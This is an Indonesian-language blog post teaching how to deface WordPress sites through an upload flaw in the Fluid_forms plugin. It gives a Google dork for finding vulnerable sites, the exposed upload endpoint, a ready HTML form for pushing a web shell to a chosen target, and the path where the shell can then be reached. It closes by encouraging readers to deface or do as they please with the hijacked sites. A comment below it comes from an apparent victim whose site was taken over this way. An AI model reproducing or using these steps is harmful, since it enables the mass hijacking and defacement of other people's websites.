Tutorial Deface WordPress Fluid_forms Upload Vulnerability

Tutorial Deface WordPress Fluid_forms Upload Vulnerability

11:09 PM
untuk artikel hari ini saya akan share Exploit WordPress Fluid_forms Upload Vulnerability. ini exploit dah agak lama sih, tapi iseng aja dipost, sapa tau masihCrotz *AWKAKWKAKW
ini Exploit Masih satu Sekutu sama FormCraft gan, silahkan baca Tutorial Deface Wordpress Plugins FromCraft Upload
wkwkw, ini postingan pertama di bulan Februari tahun 2016 diBlog ini.*eww, post pembukaan dari Nue :p wkwk
maaf baru sempet posting, soalnye speedol *eh speedy, lg mencret2 awkakwkwa :v [just kidding]


Lanjoot intip tutorial ;*
Edited By: OepilCore


#We Are Cyber Penetrate from SlemanCity!
#Official member: Sinkaroid & Seringhai
#Author: Jangene Cakep | Sinkaroid | Incef-Team ft. Sanjungan Jiwa
#Dork: inurl:fluid_forms
#Exploit & Vulnerability: /wp-content/plugins/fluid_forms/file-upload/server/php/
#Type: CSRF & Xampp ,Uploadify
#Tested:Windows XP, 7, 8, Backbox 

#CMS:WordPress
----

Dork: inurl:fluid_forms
(Selebihnya gunakan imajinasi, biar dpt yg Vuln and Verawan)

Exploit: /wp-content/plugins/fluid_forms/file-upload/server/php/

1. Masukan Dork ke kotak pencarian Google
2. Pilih target, lalu masukan Exploit. contoh: 
target.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/

3. Jika Vuln, tampilan akan berubah seperti ini


kira2 sih kek gitu tampilannya :'v

CSRF:
<form method="POST" action="http://target.co.li/wp-content/plugins/fluid_forms/file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

*ganti target.co.li -> url web target anda
* save as: .html

4. Jika sudah buka file csrf dgn web browser anda, lalu Upload file/shell yang ingin kalian Upload ke web target :p



5. Jika File/Shell anda berhasil terUpload ke web target, akan Muncul Seperti kek di gambar ini:


akan muncul Letak file/shell sobat :p

6. Shell Akses: /wp-content//plugins//fluid_forms/file-upload/server/php/files/shellname.php

done xD ~ xixihi


Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.

kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))



Gane aned ;*

Mudahkan o.O ?
Stay Cool and Keep ./Crotz , gaes :'v

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih
Next
« Prev Post
Previous
Next Post »

2 comments

  1. UnknownJune 26, 2018 at 7:30 PM

    Hello friend, everything that you have described in this article just happened to me, with the aggravating circumstance that I did not read it when I noticed that something strange was happening. The directory is the same as you describe but apparently it was installed in a plugin wp_hosting_performance_check / css. Now it seems that he has taken control of the entire site. It uninstalled all the plugins and it does not let me modify any file. You want to tell me what can I do?

    ReplyDelete
  2. Caroline CahyaAugust 21, 2019 at 1:54 PM

    This comment has been removed by the author.

    ReplyDelete

Subscribe to: Post Comments (Atom)